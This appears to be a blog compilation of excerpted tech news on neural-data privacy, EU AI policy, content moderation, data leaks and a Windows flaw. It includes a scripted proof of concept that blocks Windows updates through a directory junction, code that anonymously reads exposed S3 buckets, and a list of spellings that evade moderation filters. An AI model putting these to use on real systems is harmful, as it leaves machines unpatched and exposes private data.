Neurotech companies are selling your brain data, senators warn

Three Democratic senators are sounding the alarm over brain-computer interface (BCI) technologies’ ability to collect — and potentially sell — our neural data. In a letter to the Federal Trade Commission (FTC), Sens. Chuck Schumer (D-NY), Maria Cantwell (D-WA), and Ed Markey (D-MA) called for an investigation into neurotechnology companies’ handling of user data, and for tighter regulations on their data-sharing policies.

“Unlike other personal data, neural data — captured directly from the human brain — can reveal mental health conditions, emotional states, and cognitive patterns, even when anonymized,” the letter reads. “This information is not only deeply personal; it is also strategically sensitive.”

While the concept of neural technologies may conjure up images of brain implants like Elon Musk’s Neuralink, there are far less invasive — and less regulated — neurotech products on the market, including headsets that help people meditate, purportedly trigger lucid dreaming, and promise to help users with online dating by letting them swipe through apps “based on your instinctive reaction.” These consumer products gobble up users’ neurological data — and since they aren’t categorized as medical devices, the companies behind them aren’t barred from sharing that data with third parties.

“Neural data is the most private, personal, and powerful information we have—and no company should be allowed to harvest it without transparency, ironclad consent, and strict guardrails. Yet companies are collecting it with vague policies and zero transparency,” Schumer told The Verge via email.

The letter cites a 2024 report by the Neurorights Foundation, which found that most neurotech companies not only have few safeguards on user data but also have the ability to share sensitive information with third parties. The report looked at the data policies of 30 consumer-facing BCI companies and found that all but one “appear to have access to” users’ neural data, “and provide no meaningful limitations to this access.” The Neurorights Foundation only surveyed companies whose products are available to consumers without the help of a medical professional; implants like those made by Neuralink weren’t among them.

The companies surveyed by the Neurorights Foundation make it difficult for users to opt out of having their neurological data shared with third parties. Just over half the companies mentioned in the report explicitly let consumers revoke consent for data processing, and only 14 of the 30 give users the ability to delete their data. In some instances, user rights aren’t universal — for example, some companies only let users in the European Union delete their data but don’t grant the same rights to users elsewhere in the world.

To safeguard against potential abuses, the senators are calling on the FTC to:

  • investigate whether neurotech companies are engaging in unfair or deceptive practices that violate the FTC Act
  • compel companies to report on data handling, commercial practices, and third-party access
  • clarify how existing privacy standards apply to neural data
  • enforce the Children’s Online Privacy Protection Act as it relates to BCIs
  • begin a rulemaking process to establish safeguards for neural data, and set limits on secondary uses like AI training and behavioral profiling
  • and ensure that both invasive and noninvasive neurotechnologies are subject to baseline disclosure and transparency standards, even when the data is anonymized

Though the senators’ letter calls out Neuralink by name, Musk’s brain implant tech is already subject to more regulations than other BCI technologies. Since Neuralink’s brain implant is considered a “medical” technology, it’s required to comply with the Health Insurance Portability and Accountability Act (HIPAA), which safeguards people’s medical data.

Stephen Damianos, the executive director of the Neurorights Foundation, said that HIPAA may not have entirely caught up to existing neurotechnologies, especially with regard to “informed consent” requirements.

“There are long-established and validated models for consent from the medical world, but I think there’s work to be done around understanding the extent to which informed consent is sufficient when it comes to neurotechnology,” Damianos told The Verge. “The analogy I like to give is, if you were going through my apartment, I would know what you would and wouldn’t find in my apartment, because I have a sense of what exactly is in there. But brain scans are overbroad, meaning they collect more data than what is required for the purpose of operating a device. It’s extremely hard — if not impossible — to communicate to a consumer or a patient exactly what can today and in the future be decoded from their neural data.”

Data collection becomes even trickier for “wellness” neurotechnology products, which don’t have to comply with HIPAA, even when they advertise themselves as helping with mental health conditions like depression and anxiety.

Damianos said there’s a “very hazy gray area” between medical devices and wellness devices.

“There’s this increasingly growing class of devices that are marketed for health and wellness as distinct from medical applications, but there can be a lot of overlap between those applications,” Damianos said. The dividing line is often whether a medical intermediary is required to help someone obtain a product, or whether they can “just go online, put in your credit card, and have it show up in a box a few days later.”

There are very few regulations on neurotechnologies advertised as being for “wellness.” In April 2024, Colorado passed the first-ever legislation protecting consumers’ neural data. The state updated its existing Consumer Protection Act, which protects users’ “sensitive data.” Under the updated legislation, “sensitive data” now includes “biological data” like biological, genetic, biochemical, physiological, and neural information. And in September, California amended its Consumer Privacy Act to protect neural data.

“We believe in the transformative potential of these technologies, and I think sometimes there’s a lot of doom and gloom about them,” Damianos told The Verge. “We want to get this moment right. We think it’s a really profound moment that has the potential to reshape what it means to be human. Enormous risks come from that, but we also believe in leveraging the potential to improve people’s lives.”

Source: Neurotech companies are selling your brain data, senators warn | The Verge

AI Helps Unravel a Cause of Alzheimer’s Disease and Identify a Therapeutic Candidate

[Graphic: Alzheimer’s disease severity increases with PHGDH expression]

A new study found that a gene recently recognized as a biomarker for Alzheimer’s disease is actually a cause of it, due to its previously unknown secondary function. Researchers at the University of California San Diego used artificial intelligence to help both unravel this mystery of Alzheimer’s disease and discover a potential treatment that obstructs the gene’s moonlighting role.

[…]

Zhong and his team took a closer look at phosphoglycerate dehydrogenase (PHGDH), which they had previously discovered as a potential blood biomarker for early detection of Alzheimer’s disease. In a follow-up study, they later found that expression levels of the PHGDH gene directly correlated with changes in the brain in Alzheimer’s disease; in other words, the higher the levels of protein and RNA produced by the PHGDH gene, the more advanced the disease.

[…]

Using mice and human brain organoids, the researchers found that altering the amounts of PHGDH expression had consequential effects on Alzheimer’s disease: lower levels corresponded to less disease progression, whereas increasing the levels led to more disease advancement. Thus, the researchers established that PHGDH is indeed a causal gene to spontaneous Alzheimer’s disease.

In further support of that finding, the researchers determined—with the help of AI—that PHGDH plays a previously undiscovered role: it triggers a pathway that disrupts how cells in the brain turn genes on and off. And such a disturbance can cause issues, like the development of Alzheimer’s disease.

[…]

Another Alzheimer’s project in his lab, which did not focus on PHGDH, changed all this. A year ago, that project revealed a hallmark of Alzheimer’s disease: a widespread imbalance in the brain in the process where cells control which genes are turned on and off to carry out their specific roles.

The researchers were curious if PHGDH had an unknown regulatory role in that process, and they turned to modern AI for help.

With AI, they could visualize the three-dimensional structure of the PHGDH protein. Within that structure, they discovered that the protein has a substructure that is very similar to a known DNA-binding domain in a class of known transcription factors. The similarity is solely in the structure and not in the protein sequence.

Zhong said, “It really demanded modern AI to formulate the three-dimensional structure very precisely to make this discovery.”

After discovering the substructure, the team then demonstrated that with it, the protein can activate two critical target genes. That throws off the delicate balance, leading to several problems and eventually the early stages of Alzheimer’s disease. In other words, PHGDH has a previously unknown role, independent of its enzymatic function, that through a novel pathway leads to spontaneous Alzheimer’s disease.

That ties back to the team’s earlier studies: the PHGDH gene produced more proteins in the brains of Alzheimer’s patients compared to the control brains, and those increased amounts of the protein in the brain triggered the imbalance. While everyone has the PHGDH gene, the difference comes down to the expression level of the gene, or how many proteins are made by it.

[…]

Given that PHGDH is such an important enzyme, there are past studies on its possible inhibitors. One small molecule, known as NCT-503, stood out to the researchers because it is not very effective at impeding PHGDH’s enzymatic activity (the production of serine), which they did not want to change. NCT-503 is also able to penetrate the blood-brain barrier, another desirable characteristic.

They turned to AI again for three-dimensional visualization and modeling. They found that NCT-503 can access that DNA-binding substructure of PHGDH, thanks to a binding pocket. With more testing, they saw that NCT-503 does indeed inhibit PHGDH’s regulatory role.

When the researchers tested NCT-503 in two mouse models of Alzheimer’s disease, they saw that it significantly alleviated Alzheimer’s progression. The treated mice demonstrated substantial improvement in their memory and anxiety tests. These tests were chosen because Alzheimer’s patients suffer from cognitive decline and increased anxiety.

The researchers do acknowledge limitations of their study, one being that there is no perfect animal model for spontaneous Alzheimer’s disease. They could test NCT-503 only in the mouse models that are available: those with mutations in known disease-causing genes.

Still, the results are promising, according to Zhong.

[…]

Source: AI Helps Unravel a Cause of Alzheimer’s Disease and Identify a Therapeutic Candidate

Can the EU’s Dual Strategy of Regulation and Investment Redefine AI Leadership?

Beyond sharing a pair of vowels, AI and the EU both present significant challenges when it comes to setting the right course. This article makes the case that reducing regulation for large general-purpose AI providers under the EU’s competitiveness agenda is not a silver bullet for catching Europe up to the US and China, and would only serve to entrench European dependencies on US tech. Instead, by combining its regulatory toolkit and ambitious investment strategy, the EU is uniquely positioned to set the global standard for trustworthy AI and pursue its tech sovereignty. It is an opportunity that Europe must take.

Recent advances in AI have drastically shortened the improvement cycle from years to months, thanks to new inference-time compute techniques that enable self-prompting, chain-of-thought reasoning in models like OpenAI’s o1 and DeepSeek’s R1. However, these rapid gains also increase risks like AI-enabled cyber offenses and biological attacks. Meanwhile, the EU and France recently committed €317 billion to AI development in Europe, joining a global race with comparably large announcements from both the US and China.

Now turning to EU AI policy: the newly established AI Office and 13 independent experts are nearing the end of a nine-month multistakeholder drafting process for the Code of Practice (CoP), the voluntary technical detailing of the AI Act’s mandatory provisions for general-purpose AI providers. The vast majority of the rules will apply only to the largest model providers, ensuring proportionality: the protection of SMEs, start-ups, and other downstream industries. In the meantime, the EU has fully launched a competitiveness agenda, with the Commission’s recently published Competitiveness Compass and first omnibus simplification package outlining plans for widespread streamlining of reporting obligations, amidst mounting pushback against this simplified narrative. Add to this the recent withdrawal of the AI Liability Directive, and it’s clear to see which way the political winds are blowing.

So why must this push for simplification be replaced by a push for trustworthy market creation in the case of general-purpose AI and the Code of Practice? I’ll make three main points: 1) Regulation is not the reason for Europe lacking Big Tech companies, 2) Sweeping deregulation creates legal uncertainty and liability risks for downstream deployers, and slows trusted adoption of new technologies and thereby growth, 3) Watering down the CoP for upstream model providers with systemic risk will almost exclusively benefit large US incumbents, entrenching dependency and preventing tech sovereignty.

[…]

The EU’s tech ecosystem had ample time to emerge in the years preceding and following the turn of the century, free of so-called “red tape,” but this did not happen and will not happen again through deregulation […] One reason presented by Bradford is that the European digital single market remains fragmented, with differing languages, cultures, consumer preferences, administrative obstacles, and tax regimes preventing large tech companies from seamlessly growing within the bloc and throughout the world. Even more fragmented are the capital markets of the EU, resulting in poor access to venture capital for tech start-ups and scale-ups. Additional factors include harsh, national-level bankruptcy laws that are “creditor-oriented” in the EU, compared to more forgiving “debtor-friendly” equivalents in the US, resulting in lower risk appetite among European entrepreneurs. Finally, skilled migration is significantly more streamlined in the US, with federal-level initiatives like the H-1B visa leading to the majority of Big Tech CEOs hailing from overseas.

[…]

The downplaying of regulation as Europe’s AI hindrance has been repeated by leading industry voices such as US VC firm a16z, European VC firm Merantix Capital, and French provider Mistral AI. To reiterate: the EU ‘lagging behind’ on trillion-dollar tech companies and the accompanying innovation was not a result of regulation before there was any regulation, and is not a result of regulation now.

[…]

Whether for planes, cars, or drugs, early use of dangerous new technologies, without accompanying rules, saw frequent preventable accidents, reducing consumer trust and slowing market growth. Now, with robust checks and balances in place from well-resourced regulatory authorities, such markets have been able to thrive, providing value and innovation to citizens. Other sectors, like nuclear energy and, more recently, crypto, have suffered from an initial lack of regulation, causing industry corner-cutting, leading to infamous disasters (from Fukushima to the collapse of FTX) from which public trust has been difficult to win back. Regulators around the world are currently risking the same fate for AI.

This point is particularly relevant for so-called ‘downstream deployers’: companies that build applications on top of underlying models provided (usually) by Big Tech. Touted by European VC leader Robert Lacher as Europe’s “huge opportunity” in AI, downstream deployers, particularly SMEs, stand to gain from the Code of Practice, which ensures that necessary regulatory checks and balances occur upstream at the level of the model provider.

[…]

Finally, the EU’s enduring and now potentially crippling dependency on US technology companies has been pointedly addressed by the new Commission, best exemplified by the title of Executive Vice President Henna Virkkunen’s file: Tech Sovereignty, Security and Democracy. With the last few months’ geopolitical developments, including all-time-low transatlantic relations and an unfolding trade war, some have gone as far as warning of the possibility of US technology being used for surveillance of Europe and of the US sharing intelligence with Russia. Clearly, the urgency of tech sovereignty has drastically increased. A strong Code of Practice would return agency to the EU, ensuring that US upstream incumbents meet basic security, safety, and ethical standards whilst also easing the EU’s AI adoption problem by ensuring the technology is truly trustworthy.

So, concretely, what needs to be done? Bruegel economist Mario Mariniello summed it up concisely: “On tech regulation, the European Union should be bolder.”

[…]

This article has outlined why deregulating highly capable AI models, produced by the world’s largest companies, is not a solution to Europe’s growth problem. Instead of stripping back obligations that ensure protections for European citizens, the EU must combine its ambitious AI investment plan with boldly pursuing leadership in setting global standards, accelerating trustworthy adoption, and ensuring tech sovereignty. This combination will put Europe on the right path to drive this technological revolution forward for the benefit of all.

Source: Can the EU’s Dual Strategy of Regulation and Investment Redefine AI Leadership? | TechPolicy.Press

Europe’s Tech Sovereignty Demands More Than Competitiveness

BRUSSELS – As part of his confrontational stance toward Europe, US President Donald Trump could end up weaponizing critical technologies. The European Union must appreciate the true nature of this threat instead of focusing on competing with the US as an economic ally. To achieve true tech sovereignty, the EU should transcend its narrow focus on competitiveness and deregulation and adopt a far more ambitious strategy.

[…]

Europe’s growing anxiety about competitiveness is fueled by its inability to challenge US-based tech giants where it counts: in the market. As the Draghi report points out, the productivity gap between the United States and the EU largely reflects the relative weakness of Europe’s tech sector. Recent remarks by European Commission President Ursula von der Leyen and Tech Commissioner Henna Virkkunen suggest that policymakers have taken Draghi’s message to heart, making competitiveness the central focus of EU tech policy. But this singular focus is both insufficient and potentially counterproductive at a time of technological and geopolitical upheaval. While pursuing competitiveness could reduce Big Tech’s influence over Europe’s economy and democratic institutions, it could just as easily entrench it. European leaders’ current fixation on deregulation – turbocharged by the Draghi report – leaves EU policymaking increasingly vulnerable to lobbying by powerful corporate interests and risks legitimizing policies that are incompatible with fundamental European values.

As a result, the European Commission’s deregulatory measures – including its recent decision to shelve draft AI and privacy rules, and its forthcoming “simplification” of tech legislation including the GDPR – are more likely to benefit entrenched tech giants than they are to support startups and small and medium-size enterprises. Meanwhile, Europe’s hasty and uncritical push for “AI competitiveness” risks reinforcing Big Tech’s tightening grip on the AI technology stack.

It should come as no surprise that the Draghi report’s deregulatory agenda was warmly received in Silicon Valley, even by Elon Musk himself. But the ambitions of some tech leaders go far beyond cutting red tape. Musk’s use of X (formerly Twitter) and Starlink to interfere in national elections and the war in Ukraine, together with the Trump administration’s brazen attacks on EU tech regulation, show that Big Tech’s quest for power poses a serious threat to European sovereignty.

Europe’s most urgent task, then, is to defend its citizens’ rights, sovereignty, and core values from increasingly hostile American tech giants and their allies in Washington. The continent’s deep dependence on US-controlled digital infrastructure – from semiconductors and cloud computing to undersea cables – not only undermines its competitiveness by shutting out homegrown alternatives but also enables the owners of that infrastructure to exploit it for profit.

[…]

Strong enforcement of competition law and the Digital Markets Act, for example, could curb Big Tech’s influence while creating space for European startups and challengers to thrive. Similarly, implementing the Digital Services Act and the AI Act will protect citizens from harmful content and dangerous AI systems, empowering Europe to offer a genuine alternative to Silicon Valley’s surveillance-driven business models. Against this backdrop, efforts to develop homegrown European alternatives to Big Tech’s digital infrastructure have been gaining momentum. A notable example is the so-called “Eurostack” initiative, which should be viewed as a key step in defending Europe’s ability to act independently.

[…]

A “competitive” economy holds little value if it comes at the expense of security, a fair and safe digital environment, civil liberties, and democratic values. Fortunately, Europe doesn’t have to choose. By tackling its technological dependencies, protecting democratic governance, and upholding fundamental rights, it can foster the kind of competitiveness it truly needs.

Source: Europe’s Tech Sovereignty Demands More Than Competitiveness by Marietje Schaake & Max von Thun – Project Syndicate

Deregulation has led to huge problems globally: the monopoly/duopoly problems we can’t seem to deal with; reliance on external markets and companies that whimsically change their minds; unsustainable hardware and software choices that leave devices bricked, poorly secured, and irreparable; vendor lock-in to closed-source ecosystems; damage to innovation; privacy invasions that lead to hacking attacks; etc. As Europe we can make our own choices about our own values – we are not determined by the singular motive of profit. European values are inclusive and also promote things like education and happiness.

Content Moderation or Security Theater? How Social Media Platforms Really Enforce Community Guidelines

[…] To better understand how major platforms moderate content, we studied and compared the community guidelines of Meta, TikTok, YouTube, and X.

We must note that platforms’ guidelines often evolve, so the information used in this study is based only on the latest available data at the time of publication. Moreover, the strictness and regularity of policy implementation may vary per platform.

Content Moderation

We identified 3 main methods of content moderation in major platforms’ official policies: AI-based enforcement, human or staff review, and user reporting.

[Graphic: Content moderation practices (AI enforcement, human review, and user reporting) across Meta, TikTok, YouTube, and X]

Notably, TikTok is the only platform that doesn’t officially employ all 3 content moderation methods. It only clearly defines the process of user reporting, although it mentions that it relies on a “combination of safety approaches.” Content may go through an automated review, especially those from accounts with previous violations, and human moderation when necessary.

Human or staff review and AI enforcement are observed in the other 3 platforms’ policies. In most cases, the platforms claim to employ the methods hand-in-hand. YouTube and X (formerly Twitter) describe using a combination of machine learning and human reviewers. Meta has a unique Oversight Board that manages more complicated cases.

Criteria for Banning Accounts

| Criteria | Meta | TikTok | YouTube | X |
|---|---|---|---|---|
| Severe Single Violation | ✓ | ✓ | ✓ | ✓ |
| Repeated Violations | ✓ | ✓ | ✓ | ✓ |
| Circumventing Enforcement | ✗ | ✓ | ✗ | ✓ |

All platform policies include the implementation of account bans for repeat or single “severe” violations. Of the 4 platforms, TikTok and X are the only ones to include circumventing moderation enforcement as additional grounds for account banning.

Content Restrictions

| Platform | Age Restrictions | Adult Content | Gore | Graphic Violence |
|---|---|---|---|---|
| Meta | 10-12 (supervised), 13+ | Allowed with conditions | Allowed with conditions | Allowed with conditions |
| TikTok | 13+ | Prohibited | Allowed with conditions | Prohibited |
| YouTube | Varies | Prohibited | Prohibited | Prohibited |
| X | 18+ | Allowed (with labels) | Allowed with conditions | Prohibited |

Content depicting graphic violence is the most widely prohibited in platforms’ policies, with only Meta allowing it with conditions (the content must be “newsworthy” or “professional”).

Adult content is also heavily moderated per the official community guidelines. X allows it given adequate labels, while the other platforms restrict any content with nudity or sexual activity that isn’t for educational purposes.

YouTube is the only one to impose a blanket prohibition on gory or distressing materials. The other platforms allow such content but might add warnings for users.

[Graphic: Policy strictness across platforms, ranked from least (1) to most (5) strict across 6 categories]

All platforms have a zero-tolerance policy for content relating to child exploitation. Other types of potentially unlawful content — or those that threaten people’s lives or safety — are also restricted with varying levels of strictness. Meta allows discussions of crime for awareness or news but prohibits advocating for or coordinating harm.

Other official metrics for restriction include the following:

[Graphic: Platforms’ official community guidelines regarding free speech vs. fact-checking, news and education, and privacy and security]

What Gets Censored the Most?

Overall, major platforms’ community and safety guidelines are generally strict and clear regarding what’s allowed or not. However, what content moderation looks like in practice may be very different.

We looked at censorship patterns for videos on major social media platforms, including Instagram Reels, TikTok, Facebook Reels, YouTube Shorts, and X.

The dataset considered a wide variety of videos, ranging from entertainment and comedy to news, opinion, and true crime. Across the board, the types of content we observed to be most commonly censored include:

  • Profanity: Curse words were censored via audio muting, bleeping, or subtitle redaction.
  • Explicit terms: Words pertaining to sexual activity or self-harm were omitted or replaced with alternative spellings.
  • Violence and conflict: References to weapons, genocide, geopolitical conflicts, or historical violence resulted in muted audio, altered captions, or warning notices, especially on TikTok and Instagram.
  • Sexual abuse: Content related to human trafficking and sexual abuse had significant censorship, often requiring users to alter spellings (e.g., “s3x abuse” or “trffcked”).
  • Racial slurs: Some instances of censored racial slurs were found in rap music videos on TikTok and X.

[Pie charts: Types of content censored and censorship methods observed across platforms]

Instagram seems to heavily censor explicit language, weapons, and sexual content, mostly through muting and subtitle redaction. Content depicting war, conflict, graphic deaths and injuries, or other potentially distressing materials often requires users to click through a “graphic content” warning before they can view the image or video.

Facebook primarily censors profanity and explicit terms through audio bleeping and subtitle removal. However, some news-related posts are able to retain full details.

On the other hand, TikTok uses audio censorship and alters captions. As such, many creators regularly use coded language when discussing sensitive topics. YouTube also employs similar filters, muting audio or blurring visuals extensively to hide profanity and explicit words or graphics. However, it still allows offensive words in some contexts (educational, scientific, etc.).

X combines a mix of redactions, visual blurring, and muted audio. Profanity and graphic violence are sometimes left uncensored, but sensitive content will typically get flagged or blurred, especially once reported by users.

Censorship Method Platforms Using It Description/Example
Muted or Bleeped Audio Instagram, TikTok, Facebook, YouTube, X Profanity, explicit terms, and violence-related speech altered or omitted
Redacted or Censored Subtitles Instagram, TikTok, Facebook, X Sensitive words (e.g., words like “n*****,” “fu*k,” and “traff*cked”) altered or omitted
Blurred Video or Images Instagram, Facebook, X Sensitive content (e.g., death and graphic injuries) blurred and labeled with a warning

News and Information Accounts

Our study confirmed that news outlets and credible informational accounts are sometimes subject to different moderation standards.

Posts on Instagram, YouTube, and X (from accounts like CNN or BBC) discussing war or political violence were only blurred and presented with an initial viewing warning, but they were not muted or altered in any way. Meanwhile, user-generated content discussing similar topics faced audio censorship.

On the other hand, comedic and entertainment posts still faced strict enforcement on profanity, even when posted by news outlets. This suggests that humor and artistic contexts likely don’t exempt content from moderation, regardless of the type of account or creator.

The Coded Language Workaround

A widespread workaround for censorship is the use of coded language to bypass automatic moderation. Below are some of the most common ones we observed:

  • “Fuck” → “fk,” “f@ck,” “fkin,” or a string of 4 special characters
  • “Ass” → “a$$,” “a**,” or “ahh”
  • “Gun” → “pew pew” or a hand gesture in lieu of saying the word
  • “Genocide” → “g*nocide”
  • “Sex” → “s3x,” “seggs,” or “s3ggs”
  • “Trafficking” → “tr@fficking,” or “trffcked”
  • “Kill” → “k-word”
  • “Dead” → “unalive”
  • “Suicide” → “s-word,” or “s**cide”
  • “Porn” → “p0rn,” “corn,” or corn emoji
  • “Lesbian” → “le$bian” or “le dollar bean”
  • “Rape” → “r@pe,” “grape,” or grape emoji

This is the paradox of modern content moderation: how effective are “strict” guidelines when certain types of accounts are occasionally exempt from them and other users can exploit simple loopholes?

Since coded words are widely and easily understood, it suggests that AI-based censorship mainly filters out direct violations rather than stopping or removing sensitive discussions altogether.
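
To see why such simple substitutions work, consider a toy version of a keyword-based filter. This is an illustrative sketch only; the blocklist and matching logic are my assumptions, not any platform’s actual implementation:

```python
# Toy keyword-based moderation filter, for illustration only.
# Real platforms use far more sophisticated models; this just shows why
# trivial respellings slip past an exact-match blocklist.
BLOCKLIST = {"sex", "gun", "kill"}  # hypothetical list, not any platform's

def is_blocked(text: str) -> bool:
    # Naive exact-token matching: the approach that coded language defeats.
    return any(word in BLOCKLIST for word in text.lower().split())

print(is_blocked("a post about sex education"))    # True: direct match caught
print(is_blocked("a post about s3x education"))    # False: "s3x" evades the list
print(is_blocked("a post about seggs education"))  # False: so does "seggs"
```

Catching every variant would require aggressive normalization or context-aware models, which is exactly where keyword-driven enforcement falls short.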

Is Social Media Moderation Just Security Theater?

Overall, it’s clear that platform censorship for content moderation is enforced inconsistently.

Given that our researchers are also subject to the algorithmic biases of the platforms tested, and we’re unlikely to be able to interact with shadowbanned accounts, we can’t fully quantify or qualify the extent of restrictions that some users suffer for potentially showing inappropriate content.

However, we know that many creators are able to circumvent or avoid automated moderation. Certain types of accounts receive preferential treatment in terms of restrictions. Moreover, with social media apps’ heavy reliance on AI moderation, users are able to evade restrictions with the slightest modifications or substitutions.

Are Platforms Capable of Implementing Strict Blanket Restrictions on “Inappropriate” Content?

Especially given how much people rely on social media to engage with the world, trying to restrict sensitive conversations could be considered impractical or even ineffective. This is particularly true when context is excluded and restrictions focus solely on keywords, which is often the case for automated moderation.

Also, one might ponder whether content restrictions are primarily in place for liability protection instead of user safety — especially if platforms know about the limitations of AI-based moderation but continue to use it as their primary means of enforcing community guidelines.

Are Social Media Platforms Deliberately Performing Selective Moderation?

At the beginning of 2025, Meta made waves after it announced that it would be removing fact-checkers. Many suggested that this change was influenced by the seemingly new goodwill between its founder and CEO, Mark Zuckerberg, and United States President Donald Trump.

Double standards are also apparent on other platforms whose owners have clear political ties. Elon Musk, a prominent supporter and backer of Trump, has been reported to spread misinformation about government spending — posting or reposting false claims on X, the platform he owns.

This is despite the platform’s guidelines clearly prohibiting “media that may result in widespread confusion on public issues, impact public safety, or cause serious harm.”

Given the seemingly one-sided implementation of policies on different social media sites, we believe individuals and organizations must practice careful scrutiny when consuming media or information on these platforms.

Community guidelines aren’t fail-safes for ensuring safe, uplifting, and constructive spaces online. We believe that what AI algorithms or fact-checkers consider safe shouldn’t be seen as the standard or universal truth. That is, not all restricted posts are automatically “harmful,” the same way not all retained posts are automatically true or reliable.

Ultimately, the goal of this study is to help digital marketers, social media professionals, journalists, and the general public learn more about the evolving mechanics of online expression. With the insights gathered from this research, we hope to spark conversation about the effectiveness and fairness of content moderation in the digital space.

[…]

Source: Content Moderation or Security Theater? How Social Media Platforms Really Enforce Community Guidelines

1 Million of French Boulanger’s Customers Exposed Online for Free

In a recent discovery, SafetyDetectives’ Cybersecurity Team stumbled upon a clear web forum post in which a threat actor publicized a database allegedly belonging to Boulanger Electroménager & Multimédia, purportedly exposing 5 million of its customers.

What is Boulanger Electroménager & Multimédia?

Boulanger Electroménager & Multimédia is a French company that specializes in the sale of household appliances and multimedia products.

Founded in 1954, according to their website, Boulanger has physical stores and delivers its products to clients across France. The company also offers an app, which has over 1 million downloads on the Google Play Store and Apple’s App Store.

Where Was The Data Found?

The data was found in a forum post available on the clear web. This well-known forum operates message boards dedicated to database downloads, leaks, cracks, and more.

What Was Leaked?

The author of the post included two links to the unparsed and clean datasets, which purportedly belong to Boulanger. They claim the unparsed dataset consists of a 16GB .JSON file with 27,561,591 records, whereas the clean dataset comprises a 500MB .CSV file with 5 million records.

Links to both datasets were hidden, set to be revealed after giving a like or leaving a comment on the post. As a result, the data could be unlocked for free by anyone with an account on the forum willing to simply interact with the post.

Our Cybersecurity Team reviewed part of the datasets to assess their authenticity, and we can confirm that the data appears to be legitimate. After running a comparative analysis, it seems these datasets correspond to the data purportedly stolen in the 2024 cyber incident.

Back in September 2024, Boulanger was one of the targets of a ransomware attack that also affected other retailers, such as Truffaut and Cultura. A threat author with the nickname “horrormar44” claimed responsibility for the breach.

At the time, the data was offered on a different well-known clear web forum — which is currently offline — at a price of €2,000. Although there allegedly were some potential buyers, it is unclear if the sale was actually finalized. In any case, it seems the data has resurfaced now as free to download.

While reviewing the data, we found that the clean dataset contains just over 1 million rows, one customer per row, with some duplicates. While that’s still a considerable number of customers, it’s far smaller than the 5 million claimed by the author of the post.

The sensitive information allegedly belonging to Boulanger’s customers included:

  • Name
  • Surname
  • Full physical address
  • Email address
  • Phone number

[…]

Source: 27 Million Records from French Boulanger’s Customers Allegedly Exposed Online

Google turns early Nest Thermostats into dumb thermostats

Google has just announced that it’s ending software updates for the first-generation Nest Learning Thermostat, released in 2011, and the second-gen model that came a year later. This decision also affects the European Nest Learning Thermostat from 2014. “You will no longer be able to control them remotely from your phone or with Google Assistant, but can still adjust the temperature and modify schedules directly on the thermostat,” the company wrote in a Friday blog post.

[…]

Google is flatly stating that it has no plans to release additional Nest thermostats in Europe. “Heating systems in Europe are unique and have a variety of hardware and software requirements that make it challenging to build for the diverse set of homes,” the company said. “The Nest Learning Thermostat (3rd gen, 2015) and Nest Thermostat E (2018) will continue to be sold in Europe while current supplies last.”

[…]

Source: Google is killing software support for early Nest Thermostats | The Verge

Yes, so in about a year they will be dumb thermostats too. I don’t think I would buy one of those then.

Microsoft mystery folder fix needs a fix of its own with simple POC

Turns out Microsoft’s latest patch job might need a patch of its own, again. This time, the culprit is a mysterious inetpub folder quietly deployed by Redmond, now hijacked by a security researcher to break Windows updates.

The folder, typically c:\inetpub, reappeared on Windows systems in April as part of Microsoft’s mitigation for CVE-2025-21204, an exploitable elevation-of-privileges flaw within Windows Process Activation. Rather than patching code directly, Redmond simply pre-created the folder to block a symlink attack path. For many administrators, the reappearance of this old IIS haunt raised eyebrows, especially since the mitigation did little beyond ensuring the folder existed.

For at least one security researcher, in this case Kevin Beaumont, the fix also presented an opportunity to hunt for more vulnerabilities. After poking around, he discovered that the workaround introduced a new flaw of its own, triggered using the mklink command with the /j parameter.

It’s a simple enough function. According to Microsoft’s documentation, mklink “creates a directory or file symbolic or hard link.” And with the /j flag, it creates a directory junction – a type of filesystem redirect.

Beaumont demonstrated this by running: “mklink /j c:\inetpub c:\windows\system32\notepad.exe.” This turned the c:\inetpub folder – precreated in Microsoft’s April 2025 update to block symlink abuse – into a redirect to a system executable. When Windows Update tried to interact with the folder, it hit the wrong target, errored out, and rolled everything back.

“So you just go without security updates,” he noted.

The kicker? No admin rights are required. On many default-configured systems, even standard users can run the same command, effectively blocking Windows updates without ever escalating privileges.
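
For the curious, here is a minimal sketch of the PoC as described, wrapped in Python so it can be scripted on a disposable test VM. The mklink invocation is the one Beaumont published; the existence check and the rmdir cleanup are my assumptions (mklink refuses to overwrite an existing directory, and removing a junction does not touch its target):

```python
import os
import subprocess

# Beaumont's PoC: point c:\inetpub at a system executable via a directory
# junction. mklink is a cmd built-in, so it has to run through cmd /c.
# Per the article, no admin rights are required on many default-configured
# systems.

# Assumption: mklink refuses to overwrite an existing directory, so the
# junction can only be created where c:\inetpub is not already present.
if not os.path.exists(r"c:\inetpub"):
    subprocess.run(
        ["cmd", "/c", "mklink", "/j", r"c:\inetpub",
         r"c:\windows\system32\notepad.exe"],
        check=True,
    )
    # Windows Update now follows the junction to the wrong target, errors
    # out, and rolls everything back, i.e. no more security updates.

    # Cleanup: rmdir on a junction removes only the junction, not its target.
    subprocess.run(["cmd", "/c", "rmdir", r"c:\inetpub"], check=True)
```

Needless to say, run nothing like this on a machine you care about.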

[…]

Source: Microsoft mystery folder fix might need a fix of its own • The Register

Employee monitoring app exposes 21M work screens to internet

A surveillance tool meant to keep tabs on employees is leaking millions of real-time screenshots onto the open web.

Your boss watching your screen isn’t the end of the story. Everyone else might be watching, too. Researchers at Cybernews have uncovered a major privacy breach involving WorkComposer, a workplace surveillance app used by over 200,000 people across countless companies.

The app, designed to track productivity by logging activity and snapping regular screenshots of employees’ screens, left over 21 million images exposed in an unsecured Amazon S3 bucket, broadcasting how workers go about their day frame by frame.

[…]

WorkComposer is one of many time-tracking tools that have crept into modern work culture. Marketed as a way to keep teams “accountable,” the software logs keystrokes, tracks how long you spend on each app, and snaps desktop screenshots every few minutes.

The leak shows just how dangerous this setup becomes when basic security hygiene is ignored. A leak of this magnitude turns everyday work activity into a goldmine for cybercriminals.
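
To make “unsecured” concrete: an S3 bucket misconfigured for public access can be read by anyone on the internet, no credentials required. A minimal sketch, assuming a hypothetical bucket name (this is not WorkComposer’s actual bucket):

```python
import boto3
from botocore import UNSIGNED
from botocore.config import Config

# Anonymous (unsigned) S3 client: no AWS account or credentials needed
# when a bucket's policy allows public reads.
s3 = boto3.client("s3", config=Config(signature_version=UNSIGNED))

# Hypothetical bucket name, for illustration only.
resp = s3.list_objects_v2(Bucket="example-exposed-bucket", MaxKeys=10)
for obj in resp.get("Contents", []):
    # Each key could be a screenshot; downloading is one get_object() away.
    print(obj["Key"], obj["Size"])
```

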